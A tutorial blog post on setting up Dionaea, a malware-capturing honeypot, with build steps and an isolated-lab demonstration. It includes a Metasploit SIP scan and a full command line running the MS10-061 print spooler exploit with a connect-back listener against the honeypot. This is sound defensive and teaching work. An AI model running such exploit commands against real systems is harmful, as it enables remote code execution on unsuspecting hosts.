1. Introduction to Dionaea
Dionaea “the Nepenthes successor” is a malware capturing honeypot initially developed under The Honeynet Project’s 2009 Google Summer of Code (GSoC). Dionaea aims to trap malware exploiting vulnerabilities exposed by services offered over a network, and ultimately obtain a copy of the malware.
Dionaea features a modular architecture, embedding Python as its scripting language in order to emulate protocols. Much superior to its predecessor (Nepenthes), it is able to detect shellcodes using LibEmu and supports IPv6 and TLS.
Here I’ll be starting off by introducing the technical background of Dionaea, before moving on to demonstrating how to setup a Dionaea honeypot and seeing it in action.
Security of Dionaea
Like any other software, Dionaea is likely to contain exploitable bugs as well. In order to minimise the impact, Dionaea runs in a restricted environment without administrative privileges.
Protocols Dionaea Traps Malware From
- Server Message Block (SMB) – SMB is the main protocol offered by Dionaea. SMB has a decent history of remote exploitable bugs, and is a very popular target for worms.
- Hypertext Transfer Protocol (HTTP) – Dionaea supports HTTP on port 80 as well as HTTPS. A self-signed SSL certificate is created at startup for HTTPS.
- File Transfer Protocol (FTP) – Dionaea provides a basic FTP server on port 21. It allows creation of directories, and uploading and downloading of files.
- Trivial File Transfer Protocol (TFTP) – Dionaea provides a TFTP server on port 60 which can be used to serve files.
- Microsoft SQL Server (MSSQL) – Dionaea implements the Tabular Data Stream protocol which is used by Microsoft SQL Server. Listening to TCP/1433 and allowing clients to login, it can decode queries run on the database. [Read More]
- Voice over IP (VoIP) – Developed as part of GSoC 2011 by PhiBo, the VoIP protocol used in Dionaea is the Session Initial Protocol (SIP). This module does not connect to an external VoIP registrar / server; it simply waits for incoming SIP messages, logs all data as incidents and / or binary data dumps, and reacts accordingly.
Dionaea uses LibEmu to detect and evaluate payloads sent by attackers in order to obtain a copy of the malware.
LibEmu is used detect, measure, and if necessary, execute the shellcode. Shellcode measurement / profiling are performed by executing the shellcode in LibEmu VM, and recording API calls and arguments. This is sufficient for profiling most shellcodes; but not for multi-stage shellcodes. In addition to recording API calls and arguments, we need to allow shellcodes to take actions (e.g. creating a network connection)
Once we obtained the payload and its profile, we have to act upon it in order to acquire a copy of the malware. Following are some common techniques used by attackers, and how Dionaea act upon them:
- Shell Binding / Connect Back, Exec – Dionaea offers shell emulation for payload that offers a shell to the attacker (usually via port binding or connecting back to the attacker).
- URLDownToFile API –Again, Dionaea offers shell emulation and acts upon shellcodes that uses URLDownloadToFile API call to retrieve files via HTTP and execute retrieved files afterwards.
- Multi-Stage Payloads – We’ll never know what to expect from the subsequent stage; LibEmu is used to execute the shellcode in the LibEmu VM.
To keep things simple, Dionaea offers the service to write information / logs to text files. However, similar to any other services (especially honeypots), logging to text files is not a scalable solution.
In addition to that, Dionaea uses a communication system that is much superior to text logging known as incidents. Incidents, containing information about the origin and properties of an “attack”, are passed using incident handlers (iHandle). The LogSQL Python script is an iHandler what writes interesting incidents to a SQLite database. One advantage of using incidents logging is the ability to cluster information based on the initial attack when retrieving data from the database.
On top of local logging system, Dionaea can also be configured to send log streams to a XMPP server.
There are much more to logs for a malware capturing honeypot such as Dionaea. Once you’ve obtained a copy of a malware, you have the option to either store the binaries locally, or submit the file to some external tools or services (e.g. CWSandbox, Norman Sandbox, VirusTotal, Anubis, etc.) for further analysis.
2. Setting Up a Dionaea Honeypot
With some idea of how Dionaea works, now I will be demonstrating (step-by-step) how I setup my Dionaea honeypot on my Ubuntu 12:04.4 LTS machine.
apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3
git clone git://git.carnivore.it/dionaea.git dionaea
** We will install all dependencies to /opt/dionaea.
git clone git://git.carnivore.it/liblcfg.git liblcfg
git clone git://git.carnivore.it/libemu.git libemu
tar –xvzf libev-4.04.tar.gz
tar –xvzf libpcap-1.1.1.tar.gz
Install Python 3.2.2
tar –xvzf Python-3.2.2.tgz
./configure –enable-shared –prefix=/opt/dionaea –with-computed-gotos –enable-ipv6 \
tar –xvzf Cython-0.16.tar.gz
/opt/dionaea/bin/python3 setup.py install
** Ensure all required dependencies are installed properly before continuing on.
make && make install
Test If Your Installation Works:
Before you put your Dionaea honeypot live on the network, you need to configure it to your environment and preference. Dionaea configuration file – dionaea.conf – is located at directory /opt/dionaea/etc/dionaea/.
Now, with a working Dionaea honeypot, we’ll look into how it can be used to capture and analyse malware.
3. Dionaea in Action
Before we get all excited and start attacking the newly setup Dionaea honeypot, first let’s setup an isolated network.
Here I’ve my Dionaea setup on my Ubuntu 12.04.4 LTS machine (IP Address: 192.168.1.2), and a Debian Jessie box (IP Address 192.168.1.12) setup as my attacking machine with Metasploit and Nmap as my attacking tool.
With my isolated network setup, let’s get Dionaea up and running!
/opt/dionaea/bin/dionaea –r /opt/dionaea
Before I start attacking my Ubuntu box, I’d performed reconnaissance using Nmap. You should be able to see Dionaea “providing” all sort of services. On the other end of the network, you should be able to see Dionaea picking up some traffics.
SIP Options Scan
Now, let’s perform a more specific type of scan – SIP Options Scan – using Metasploit.
/opt/metasploit/msf3/msfcli auxiliary/scanner/sip/options CHOST=192.168.1.12 CPORT=5066 RHOST=192.168.1.2 RPORT=5060 E
Looking into your Dionaea text log file, located at /opt/dionaea/var/log/dionaea.log, you will be able to investigate into connection traffics and look for possible attack indicators.
Looking into the verbose text logged by Dionaea can be a pain. Alternatively, as mentioned earlier in the first section, we can view attacking traffics as incidents by querying the LogSQL SQLite database. Using the ReadLogSQLTree Python script provided, we can view attacking traffics as incidents.
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite
Information logged in each incident includes the exploited vulnerability, time, attacker, information about shellcodes, and files offered for download.
MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
We’ve seen how Dionaea reacts to service scanning. Let’s see how it fair when we include shellcodes in our attack.
Knowing that Dionaea emulates SMB service to trap malware, let’s exploit a remote code execution vulnerability that can be found in Print Spooler Service on Microsoft Windows systems (MS10-061).
/opt/metasploit/msf3/msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.1.2 EXITFUNC=process LHOST=192.168.1.12 LPORT=4444 E
Here we can see Dionaea has captured and offered number binaries for further analysis. These captured / downloaded binaries are made available at /opt/dionaea/var/dionaea/binaries.
- Honeypots CERT Exercise Handbook
- VMware Network Isolation for a Malware Analysis Lab, Lenny Zelster. Aug 15, 2011.
- Dioanea Emulates MS10-061, Markus Koetter. Sep 26, 2010.
- MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution, Microsoft Knowledge Base.
- Microsoft Print Spooler Service Impersonation Vulnerability, Rapid7 Vulnerability & Exploit Database.